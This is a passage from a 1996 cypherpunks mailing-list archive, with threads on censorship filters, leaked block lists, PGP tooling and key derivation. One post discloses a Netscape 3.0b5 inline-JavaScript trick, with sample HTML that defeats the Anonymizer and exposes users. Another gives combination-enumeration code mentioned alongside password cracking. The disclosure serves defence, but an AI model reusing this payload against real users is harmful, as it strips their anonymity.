>>     about bypassing the censorship on the client-server level.  Relatively
>>     platform independent.
>
>Using a hardware based filter is about as bad as using the IP security header
>fields for content descriptions.  It's not at the level where filtering
>belongs.  Filtering should be at the software level where it currently is.
>Since this can easily be broken, it might be better to have "Kid Safe" ISP's
>that would use a firewall to filter data.

Or even better yet, they could actually teach thier children to deal with
such information instead of sheltering them from it.

I have dealt with a number of parents who have the idea that they can filter
everything the kid hears or sees.  The type of intelectual and emotional
basketcases that result are not very plesant to interact with.  They tend to
go through alot of rough times when they have to go out into the world and
see a wide variety of views, instead of just seeing what mommy and daddy
want them to.  What happens from there is generally not very pretty or very
fun for the person involved.

I do not believe that these types of filters are good.  If you have that
much concern about what your child can see, then you should not give them
net access at all.  (And remember to also not to leave them at the library
where they might find just as much filth...)  "If you don't want your kids
to be hit by information, then don't let them play on the information
superhighway."

Without contradictoy viewpoints, children do not learn how to decern between
them.  They get indoctrinated into the idea that they must accept ideas as
they are fed to them.  That learning consists of taking what is provided and
not to go out and find those ideas which might be "harmful" or "dangerous"
without perental supervision.  What we are getting is a bunch of emotional
cripples who cannot handle anything intelectually sharper than a rubber
ball.  (And it must be a ball bigger than two inches in diameter, else they
might choke on it.)

With these sort of tools, we are conditioning our children that it is OK if
someone filters their information before they see it. (Without even knowing
the *KIND* of information being filtered, because even *THAT* level of
knowledge is harmful and/or proprietary.) That it is OK for some parental
figure to eliminate all the "nasty" and "awful" information before someone
can hurt themselves with it.  That itt is OK to prevent others from viewing
information to complex for their childlike minds.

We are becoming a nation of the babysat.  Anything that our nannys deem
harmful is hidden away in the bedrooms of the parental units.  And maybe it
is harmful.  They have to scan through it all day long and look what kind of
self-righous pricks they have become!

At least I am able to instill some sort of love of knowledge and exploration
into my daughter.  Hopefully it will stick before the control freaks in this
culture are able to knock it out of her...

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vinnie moscaritolo <vinnie@webstuff.apple.com>
Date: Sun, 7 Jul 1996 02:29:39 +0800
To: snow@crash.suba.com
Subject: Re: Net and Terrorism
Message-ID: <v03007601ae0444e551ad@[38.26.2.89]>
MIME-Version: 1.0
Content-Type: text/plain


>On Fri, 5 Jul 1996, vinnie moscaritolo wrote:

> As for a solution to governement problems, I have always and still belive
> in the ballot box first. And the only way to win votes is to appeal to the
> morons out there who do vote.. Maybe there is hope in the next generation
> of internet literate kids.. or maybe I am just a dreamer.
>

>snow@crash.suba.com wrote
>	You are a dreamer. Netscape, TV for the internet.

BS. I am not being that idealistic. look all I am saying is that maybe the
net just offers kids the ability to see a variety of views instead of the
mainstream liberal (or whatever it will be next week) controlled media. For
now anyways any entity that has something to say and can write his way out
of a paper bag has pretty much the same ability to influence on the net (at
least newsgroups) as say Ted Copulate does.

Maybe freedom we have here wont last for long, maybe the Pointcast of the
future will just create another MTV generation...but at least for now we
have a voice.


Vinnie Moscaritolo
------------------
"friends come and friends go..but enemies accumulate."
http://www.vmeng.com/vinnie/
Fingerprint: 4FA3298150E404F2782501876EA2146A






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 7 Jul 1996 02:26:22 +0800
To: Hallam-Baker <hallam@ai.mit.edu>
Subject: Re: Shrink-Wrap Lic. uphelo by courts.  From Edupage, 4 July 1996
In-Reply-To: <31DDAECD.41C6@ai.mit.edu>
Message-ID: <Pine.SUN.3.94.960706114445.27852F-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


[My name is invoked]

There has been a lengthy discussion of this issue on the cyberia-l list.
I'm not an intellectual property specialist, so I stay out it...

to join the cyberia-l list, send a

  subscribe cyberia-l <yourname>

to

  listserv@listserv.aol.com

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's hot here.  And humid.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 7 Jul 1996 02:30:02 +0800
To: frissell@panix.com>
Subject: Re: I confess [Was: Who was that Masked Cypherpunk?]
In-Reply-To: <2.2.32.19960705182536.008209bc@popserver.panix.com>
Message-ID: <0lrciHu00YUu03vlY0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 5-Jul-96 Re: I confess [Was: Who
was.. by Duncan Frissell@panix.co 
> JR offered an amendment which changed the language to refer to "so-called
> Key Escrow (actually government access to keys GAK)"  and he also explained
> that "escrow" is where you place something with a trusted third party and
> the government is neither trusted nor a third party.  He mentioned
> cypherpunks live on CSPAN.
>  
> Maybe when JR finished the Con he can post the original proposed language of
> the LPs plank and the final language as amended.


I was sitting not far from Jim when he offered the amendment; I remember
it passing overwhelmingly. However, I don't think think the word "GAK"
was in there -- just "government access to keys."

The change to the platform, including Jim's amendment, passed unanimously.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 7 Jul 1996 02:38:11 +0800
To: cypherpunks@toad.com
Subject: Re: Word lists for passphrases
In-Reply-To: <199607061436.KAA05825@jekyll.piermont.com>
Message-ID: <199607061553.LAA05917@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Perry E. Metzger" writes:
> 
> AwakenToMe@aol.com writes:
> > I have a util that will create a word list starting from
> > aaaaaaaaaaa on up to anythingggggggg basically you could do every
> > combination. Let me know if ya want it.
> 
> That would really be of great use for doing wordlist crack runs. It
> must have taken you a long time to write -- generous of you to offer
> it.

I want to apologize to everyone for being gratuitously nasty
here. It wasn't called for.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 7 Jul 1996 03:21:51 +0800
To: cypherpunks@toad.com
Subject: Re: Word lists for passphrases
In-Reply-To: <199607061436.KAA05825@jekyll.piermont.com>
Message-ID: <1cJNqD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:
> AwakenToMe@aol.com writes:
> > I have a util that will create a word list starting from aaaaaaaaaaa on up
> > anythingggggggg
> > basically you could do every combination. Let me know if ya want it.
>
> That would really be of great use for doing wordlist crack runs. It
> must have taken you a long time to write -- generous of you to offer
> it.

K3wl Hack, D00dz!  Why don't you post it to coderpunks - it's probably way
too technical for cypherpunks.  I wonder if the util comes with the source
code, and what language it's written in.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Sun, 7 Jul 1996 03:27:14 +0800
To: cypherpunks@toad.com
Subject: NYT/CyberTimes on CWD article
Message-ID: <v01510102ae044ed3a7e6@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


"We are writers, not crytographers."

-Declan

---


http://www.nytimes.com/library/cyber/week/0706patrol-reporters.html



              July 6, 1996



              Reporters Claim to Have
              Lists of Blocked Sites

              By PAMELA MENDELS

              Reporters Brock N. Meeks and Declan B.
              McCullagh say they've got a little list.

              Several actually.

              The lists
              are of Internet
              sites that,
              in the eyes
              of several companies making parental control
              software, could be considered inappropriate
              to children. The lists are supposed to be
              secret.

              But Meeks and McCullagh say they have
              obtained lists compiled by Microsystems
              Software, Inc., the Framingham,
              Mass.-based manufacturer of Cyber Patrol;
              Los Altos, Calif.-based SurfWatch
              Software, a subsidiary of Spyglass, Inc.,
              and Santa Barbara, Calif.-based Solid Oak
              Software, Inc., maker of CYBERsitter --
              three of the leading producers of parental-
              control filtering software.

              McCullagh said that he and Meeks were able
              to view the complete Cyber Patrol and
              CYBERsitter lists and part of the SurfWatch
              list.

              In an article published this week in
              CyberWire Dispatch, a report on
              Internet-related issues distributed through
              e-mail, Meeks and McCullagh wrote that
              they had taken a peek at some of the sites
              contained on the lists and had then contacted
              groups that might be concerned about the
              listings.

              Representatives of organizations ranging in
              advocacy from feminism to gun lobbying to
              animal rights said they been disturbed to
              learn that some sites they endorse had made
              the lists.

              Kim A. Gandy, executive vice president of
              the National Organization for Women, said
              Friday that she was upset to learn that
              CYBERSitter blocks access to NOW's Web
              site. Further, she said she did not like the
              company's rationale: that the NOW site
              contains links to, among other things, sites
              about homosexuality.

              "It's ridiculous," Gandy said. "It's insulting.
              And I think most parents would not approve
              of that kind of censorship. Lots of parents
              don't want children surfing pornography,
              but would not think of denying them access
              to legitimate information."

              Marc E. Kanter, director of marketing for
              Solid Oak, confirmed Friday that NOW's
              site had been included on the CYBERsitter
              not-for-children list because of its links
              leading to "sexual preferentation" sites. "This
              is what our users want," he said. "If they
              don't want to restrict access to this material,
              they don't have to buy it or they can simply
              turn it off. We are not trying to play any
              political role. We are simply providing a tool
              for parents." Officials of the Gay & Lesbian
              Alliance Against Defamation were also upset
              that the Cyber Patrol list blocked several
              Internet discussion groups devoted to news
              of interest to the gay community.

              "We feel that this is the kind of thing
              important to gay and lesbian youth, to read
              about our community," said Lauren R.
              Javier, director of information systems for
              the Gay & Lesbian Alliance, adding that the
              newsgroups contained little if any sexually
              explicit material.

              Javier added that Cyber Patrol officials had
              been responsive in the past to complaints, so
              he wanted to give them "the benefit of the
              doubt" and intended to contact them about
              the matter.

              For his part, Nigel R. Spicer, president of
              Microsystems, said he had not examined the
              reasons that all the gay newsgroup sites
              named by the article were included on the
              Cyber Patrol list. The one site he did check
              after reading Meeks' report, however, was
              on the list because it contained links to
              personals ads, he said.

              McCullagh is keeping mum about how he
              and Meeks got the lists in the first place,
              although he denies that either of them
              personally decoded the software. "Brock and
              I are not cyptographic analysts," he said.
              "We don't spend our days de-encrypting
              files. We are writers, not crytographers."

              Spicer was less than happy about the
              prospect that Cyber Patrol's list may have
              fallen into outsiders' hands. He said that, so
              far, he had been unable to confirm whether
              the reporters had the true list for Cyber Patrol
              and, if so, how they had managed to obtain
              it.

              "It's always a concern if you believe people
              are getting access to material you've gone to
              the trouble to not make available," he said.
              "If we believe the encryption scheme has
              been compromised, we will make another
              one."

              Kanter, of CYBERsitter, said the list
              mentioned in the Cyberwire Dispatch article
              was, indeed, his company's. "I hope that list
              doesn't get out beyond where it was," he
              said.

              Jay S. Friedland, vice president of marketing
              for SurfWatch products, said Friday that he
              had not yet read the article. He said the
              blocking companies keep their lists secret for
              two reasons: to prevent their misuse and to
              keep their competitive edge.

              "Clearly, each company has a proprietary
              advantage," Friedland said. "One of our
              competitors could take and use the same
              information."

###






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cs.berkeley.edu>
Date: Sun, 7 Jul 1996 06:15:19 +0800
To: cypherpunks@toad.com
Subject: Netscape 3.0b5 can unanonymize Anonymizer
Message-ID: <199607061933.MAA07654@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The new netscape has this "feature" where the RHS of KEY=value pairs in tags
can contain inline Javascript, which is evaluated to get the actual RHS.

For example, the HTML:

Did you really think you could be <a href="&{window.open('noanon.html','',
'toolbar=1,location=1,directories=1,status=1,menubar=1,scrollbars=1');
'/'};">anonymous</a>?

will open a new, unanonymized, window (you don't even have to click on the
link).  The main problem is that the Anonymizer doesn't filter out the
new way of embedding Javascript:

&{this.is("javascript code")};

So, if you use the Anonymizer with netscape 3.0b5, _disable_ Javascript
until this is fixed (better yet, disable Javascript and Java entirely,
but that's another story for another time...).

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMd6/nEZRiTErSPb1AQGEPgQAu9NaxafrQDrqdTLUkzQ7k0D6Pq8FxIx1
7Mo3j6ACs6Flp2Tq+2szh6Ch+U0r21LL5NuC3zQ/BA9j/UmqU+c5XM7NRFFGEEhY
f1RakLlaiWp+gnxv3dgWWMUZ30iB01kNbIGcl4X3FPLUpyavK45KoqjRJh13s/K+
ACWmg1pgmXk=
=23r4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 7 Jul 1996 04:40:07 +0800
To: AwakenToMe@aol.com
Subject: Re: Word lists for passphrases
In-Reply-To: <960706092922_350344400@emout18.mail.aol.com>
Message-ID: <199607061744.MAA31864@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


AwakenToMe@aol.com wrote:
> 
> I have a util that will create a word list starting from aaaaaaaaaaa on up to
> anythingggggggg
> basically you could do every combination. Let me know if ya want it.
> 

Here's the C++ prog that I wrote 1.5 yrs ago for my friend who needed it
for genetic experiments on evidence in OJ "ZAEBAL" Simpson trial:


void nested_loops(int max_depth, int *lower,
      int *upper, void (*action)(int *indexes, int depth))
/*
   calls (*action) for every combination of numbers of size max_depth
   o max_depth - size of all combinations
   o lower     - lower boundaries for indices 0 -- max_depth - 1
   o upper     - upper boundaries for indices 0 -- max_depth - 1
   o action    - called for every combination

  Example:

   int lwr[] = { 'a', 'a' };
   int upr[] = { 'b', 'b' };
   nested_loops( 2, lwr, upr, some_action );

  calls some_action for every combination
  aa ab ba bb
*/
{
  int *indexes = new int[max_depth];
  int cur_depth = 0;
  indexes[cur_depth] = lower[cur_depth];
  do {
     if( indexes[cur_depth] < upper[cur_depth] ) {
       if( cur_depth == max_depth - 1 ) {
         (*action)( indexes, cur_depth ); // Acting only deep enough
         indexes[cur_depth]++;
       } else {
         cur_depth++;
         indexes[cur_depth]=lower[cur_depth];
       }
     } else {
       if( --cur_depth >= 0 )
         indexes[cur_depth]++;
     }
  } while( cur_depth >= 0 );
  delete [] indexes;
}

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 7 Jul 1996 05:06:26 +0800
To: bryce@digicash.com
Subject: Re: Need PGP-awareness in common utilities
In-Reply-To: <199607061311.PAA08700@digicash.com>
Message-ID: <199607061753.MAA31894@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


bryce@digicash.com wrote:
> I really don't see why programs like majordomo, UseNet
> moderation-bots, and most noticeably the PGP key distribution
> program are PGP-unaware.

My moderation bot STUMP is not only PGP-aware, it is also doing
a lot of PGP-related things. Among them: 

1) For posters who voluntarily chose additional protection, STUMP allows
only messages with a valid PGP signature to be posted. All posts from
these people that do not have a PGP sig or have an invalid sig, are
automatically rejected. It protects them from forgeries.

2) All exchange between my modbot and human moderators is PGP-signed
(and encrypted when necessary), to insure integrity of moderation
email traffic.

3) All message approved for posting to usenet get signed with Greg
Rose's PGPMoose program.

4) There is an additional service for those who post through anonymous
remailers BUT want to have an identity and reputation. The idea is that
they submit their PGP keys to the robomoderator, and later robomod
takes the user id from the PGP key, replacing meaningless anonymous
addresses with their identity.

We currently have at least two posters whose real life identities are
unknown, who use this feature and have sent us their PGP keys.

STUMP is currently working in production mode seemingly with no problems.

For details, look at 

	http://www.algebra.com/~ichudov/usenet/scrm/robomod/robomod.html

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 7 Jul 1996 04:09:39 +0800
To: cypherpunks@toad.com
Subject: Re: CCC Crypto Lock
Message-ID: <199607061734.NAA18987@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  6 Jul 96 at 4:10, anonymous-remailer@shell.port wrote:

> MicroPatent, 4 July 96
[..]
> Abstract: Disclosed systems and methods for protecting a 
> software program from unauthorized use and copying 
> through the removal at least one of a plurality of 
> instructions comprising a software program, and 
> encrypting the removed instruction utilizing an 
> encryption algorithm to produce an encrypted instruction, 
> the encryption algorithm responsive to a randomly 
> generated key. 

Would certain computer  viruses be considered prior art here? (Be it 
that they encrypt for the purposes of hiding rather than copy 
protection though.)



Rob.

---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 7 Jul 1996 04:19:47 +0800
To: Anthony Daniel <anthony@direct.it>
Subject: Re: What remains to be done.
Message-ID: <199607061734.NAA18984@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  6 Jul 96 at 13:32, Anthony Daniel wrote:

> Should try SECURE DESK-TOP as well (PC only), it can encrypt (DES and IDEA)
[..]
> And it can add PEM capabilities to most e-mail clients and it's WIN95 and

PGP capabilities would be nice. :)

> user friendly. Try it at:
> 
>                 http://www.systems.it/secure
> 
> There are NO export restrictions on it as well because it's Italian made.

Well, it can't be downloaded from a US site to a non-US site anyway. 

It's nice to see some non-US strong crypto in that it will be all the 
more impetus to relax ITAR.

Rob
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anthony Daniel <anthony@direct.it>
Date: Sat, 6 Jul 1996 21:44:39 +0800
To: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Subject: Re: What remains to be done.
Message-ID: <2.2.32.19960706113239.006942a4@betty.direct.it>
MIME-Version: 1.0
Content-Type: text/plain


Hi there

Should try SECURE DESK-TOP as well (PC only), it can encrypt (DES and IDEA)
any: 
- file 
- directory 
- groups of directories
- Hard Disk
- Floppy
- Removable drive

And it can add PEM capabilities to most e-mail clients and it's WIN95 and
user friendly. Try it at:

                http://www.systems.it/secure

There are NO export restrictions on it as well because it's Italian made.

ciao

Anthony

-------------------------------------------
>At 12:58 PM 7/4/96 +0000, Deranged Mutant wrote:
>>Another need is for file/disk-encryption utilities.  I'm not familiar 
>>with what's out there for Macs, but for PCs there's SFS and ASPICRYP
>>for SCSI drives (with no source!) and SFS, SecureDrive and SecureDevice
>>for HD (or FD).  The latter won't work on Win95. AFAIK, SFS and 
>>SecureDrive aren't 100% friendly with Win95 either, though they'll work.
>
>        I'll just add that Jetico puts out BCrypt, which works perfectly
>with Win95. Of course it costs, but one can try out the software only
>version, then upgrage to hardware encryption!
>_______________________
>Regards,            He who knows others is wise. 
>		    He who knows himself is enlightened.
>Joseph  Reagle      http://rpcp.mit.edu/~reagle/home.html
>reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 7 Jul 1996 05:07:30 +0800
To: bryce@digicash.com
Subject: Re: Need PGP-awareness in common utilities
Message-ID: <199607061837.OAA19841@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  6 Jul 96 at 15:11, bryce@digicash.com wrote:
[..]
> I really don't see why programs like majordomo, UseNet
> moderation-bots, and most noticeably the PGP key distribution
> program are PGP-unaware.

> Okay, fine.  Having waited for FIVE YEARS or however long it has
> been, you who are responsible for such handy dandy programs may now
> convincingly argue that you might as well wait for another few
> months to get PGPlib.  But I sincerely hope that once PGPlib arrives
> we don't wait another five years before using it.

Good point...

> There is another argument that people sometimes make-- that
> it is too complicated to ensure pubkey<->True Name.  SO WHAT!  

I've <i>never</i> seen that argument.  It's a non-issue for making 
programs PGP-aware.

[..]
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Sun, 7 Jul 1996 05:15:29 +0800
To: pgut001@cs.auckland.ac.nz
Subject: Re: Transforming variable- to fixed-length keys
Message-ID: <199607061837.OAA19848@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  7 Jul 96 at 1:47, pgut001@cs.auckland.ac.nz wrote:
[..]
> I've run into a problem in writing a general-purpose n-byte input to m-byte
> output transformation function.  What this does is take an arbitrary-length
> user key and transform it to a fixed-length encryption key (for example an
> entered passphrase into a 112-bit triple-DES key).  The constraints on memory
> usage are:
>  
> - The input (user) key can't be altered (you can't change data passed in by the
>   caller)
> - The user key can't be copied to an internal buffer (it can be of arbitrary
>   length, and is sensitive material so shouldn't be copied elsewhere)
>  
> In other words there's no temporary storage available apart from what's
> provided in the output key.  This is almost always a different length from the
> input key.
>  
> Some other constraints are:
>  
> - The transformation must be algorithm-independant (it shouldn't, for example,
[..]
> - The transformation must be able to be iterated to make a password-guessing
>   attack harder to perform.

Hmm. What about the following:

  Use a constant (non-weak) key for a cipher (perhaps the hash of 
  the passphrase under certain circumstances?)

  For iteration-0, CFB (or some other feedback mode)-encrypt the
  passphrase from the input buffer   to the output buffer (assuming the
  library doesn't require that the plaintext and ciphertext be in the same
  buffer)

  For following iterations, repeatedly CFB-encrypt the buffer,
  using a counter in data bytes.

This method could use hash algorithms in MDC or Luby-Rackoff forms
as well as block ciphers (and perhaps some stream ciphers).

Another method might be to seed a PRNG similar to that used in PGP 
2.x with the passphrase, have it stir the bytes a number of times, 
and then use the output as the key:

  randPoolAddBytes(passphrase, passlen);
  for(i=0;i<iterationCount;i++) randPoolStir();
  randPoolGetBytes(key, keylen);

> Here's my initial approach, if anyone has any comments to make on this or knows
> of a better way to do it, please let me know.
[..]
> The first stage in the key hashing prepends the length of the string as a
> big-endian 16-bit count to the user key:
>  
>     +------+-------------------------------------------------------+
>     |Length|                      User Key                         |
>     +------+-------------------------------------------------------+
>  
> The aim of the hashing is to reduce this variable-length input string to a
> fixed-length key appropriate to the encryption algorithm being used.  This is
> done by treating the user encryption keys as circular buffers and repeatedly
> hashing chunks of the user key and xoring the result into the output buffer.
[..]
> Since the input to the hash function is much larger than its output, a
> significant amount of the user key affects each chunk of the encryption key.
> The size of each "chunk" is determined by the hash function being used.  For
> example with the MD4 hash function, 64 bytes of user key affect each 16 bytes
> of encryption key.
[..]

Questions: Are you using the previous chaining-variables/hash for 
each successive chunk?  How do you pad passphrases that are smaller 
than the minimum input for a hash function?



Rob.
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sun, 7 Jul 1996 08:52:53 +0800
To: cypherpunks@toad.com
Subject: Re: NYT/CyberTimes on CWD article
Message-ID: <ae049d8601021004b2d9@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 9:17 AM 7/6/96, Declan McCullagh wrote:
>"We are writers, not crytographers."
>
>-Declan
....
This seems to be an application for Bloom filters.
See page bottom of page 561 in Knuth's "Searching and Sorting", First Edition.
(Vol 3 of Art of Computer Programming)

With a Bloom filter you can hide which URLs you reject yet quickly rejecting
particular URLs.

Compute SHA(URL) yielding 160 bits. Divide that into 16 ten bit quantities
b[i], for 0<=i< 10.
Reject the access if P[b[i]] = 1 for each i. P is an array of 1024 bits
computed by someone
with the index prohibitorum. (pardon my Latin)

Yes, this excludes 1/1024 "falsely accused" URLs, but you get the idea.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Zbigniew Fiedorowicz <fiedorow@math.ohio-state.edu>
Date: Sun, 7 Jul 1996 06:07:52 +0800
To: cypherpunks@toad.com
Subject: Re: MacPGP 2.6.3 released
Message-ID: <v03007807ae04691ba4f0@[140.254.112.106]>
MIME-Version: 1.0
Content-Type: text/plain


I have changed the method of distribution of FatMacPGP 2.6.3.  It is
now available by anonnymous FTP from Mike Johnson's ITAR compliant
crypto archives at ftp://ftp.csn.net/mpj/.

My web page
  http://www.math.ohio-state.edu/~fiedorow/PGP
now contains detailed instructions and URL links explaining how to obtain
the software from Mike Johnson's site, rather than the software itself.
In particular, it is no longer necessary to have a previous version of
PGP in order to get FatMacPGP 2.6.3.

Note: my system administrators have changed the IP address of
www.math.ohio-state.edu
this weekend.  If your DNS server has difficulty finding the site,
you might try
 http://128.146.111.31/~fiedorow/PGP

Feel free to redistribute FatMacPGP 2.6.3 to friends, acquaintances,
etc and to put it up on local BBS's. It is your personal responsibility
to insure you don't to violate any laws or international treaties doing so.

Zig Fiedorowicz






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Sun, 7 Jul 1996 00:02:30 +0800
To: cypherpunks@toad.com, e$@thumper.vmeng.com
Subject: Need PGP-awareness in common utilities
Message-ID: <199607061311.PAA08700@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

<flame="medium">
<!-- thin-skinned, insecure people don't read this.  If you are
taking medication or are a pregnant woman, consult your doctor
before participating. -->


I just got a letter back from majordomo@thumper.vmeng.com 
because my easy-PGP script had clearsigned my outgoing message
to it, and majordomo didn't know what to do with the clearsigned
message.


I really don't see why programs like majordomo, UseNet
moderation-bots, and most noticeably the PGP key distribution
program are PGP-unaware.


Okay, fine.  Having waited for FIVE YEARS or however long it has
been, you who are responsible for such handy dandy programs may
now convincingly argue that you might as well wait for another
few months to get PGPlib.  But I sincerely hope that once PGPlib
arrives we don't wait another five years before using it.


(There is another argument that people sometimes make-- that
it is too complicated to ensure pubkey<->True Name.  SO WHAT!  
Pubkey<->True Name mapping is an advanced feature that depends
upon the existence of some kind of public key infrastructure.
Many people, myself included, wouldn't even USE pubkey<->True
Name mapping if we had it!  Just implement some basic
privacy/authentication functions (trivial, using PGP 2.6 under
Unix) and MitCH be damned!  If we had started with the simple
stuff five years ago we might HAVE a complete, secure
infrastructure by now.)


As an example of this sad state of affairs, no less of a
cryptographic enthusiast than Robert Hettinga runs a mailing
list (several actually) which breaks every PGP clear-signature
that it encounters.


Really pitiful, that even our own mailing lists are incompatible
with PGP.


Regards,

Bryce

PGP sig follows:  [If you see garbage beyond this line, it means you are an 
anachronistic troglodyte.  If you see a "PGP sig okay!" it means you are hi-
tech.  If you see "PGP sig not okay!" it means some mail-handling software 
between me and you is written/maintained by anachronistic troglodytes.  :-)]

</flame>




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMd5l40jbHy8sKZitAQHZZAL7BUlItvGLZaTfBgTORFATkPM141R0P6Ux
mOkQY3IG0/Vmf9nJEOg8bubdaCuYmuVCJhAek6boyQsmd6VTxqxVChniSWN1Uhth
Ony1VSmufCdeqFbCGBqcAM5rfF8KM49h
=9obd
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 7 Jul 1996 07:08:01 +0800
To: bryce@digicash.com
Subject: Re: Need PGP-awareness in common utilities
In-Reply-To: <199607061950.VAA21507@digicash.com>
Message-ID: <199607062013.PAA00038@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


bryce@digicash.com wrote:
> An entity calling itself ichudov@algebra.com probably wrote 
> something like:
> >
> > My moderation bot STUMP is not only PGP-aware, it is also doing
> > a lot of PGP-related things. Among them: 
> > 
> > 1) For posters who voluntarily chose additional protection, STUMP allows
> > only messages with a valid PGP signature to be posted. 
> <snip>
> > 2) All exchange between my modbot and human moderators is PGP-signed
> > (and encrypted when necessary)
> <snip>
> > 3) All message approved for posting to usenet get signed with Greg
> > Rose's PGPMoose program.
> <snip>
> > 4) There is an additional service for those who post through anonymous
> > remailers BUT want to have an identity and reputation.
> <snip>  <Great idea!>
> > We currently have at least two posters whose real life identities are
> > unknown, who use this feature and have sent us their PGP keys.
> > 
> > STUMP is currently working in production mode seemingly with no problems.
> 
> 
> Okay Igor, that is an impressive list of features!  Now what 

thanks

> I want to know (and what I want other people here to hear) is:
> _How_ difficult was it to incorporate these PGP features into
> your software? 

Almost nothing is dufficult, in general. In particular, implementation
of these features was easy. Coming up with how they should work was
not that easy. Thanks to members of Cypherpunks list for their
suggestions, by the way.

You know, this stuff is easy to do in perl and sh.

> My guess is that it was a simple matter of
> making a couple of system calls to PGP, plus maybe extra 
> defense against replay attacks (you _do_ have defense against
> replay attacks don't you?) and the fact that you have more
> debugging work because you have more features.

Depends on what replay attacks you are talking about. If you are
more specific, I can talk about it.

Some of it is discussed at

	http://www.algebra.com/~ichudov/usenet/scrm/robomod/robomod.html

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "strick (henry strickland)" <strick@versant.com>
Date: Sun, 7 Jul 1996 09:20:51 +0800
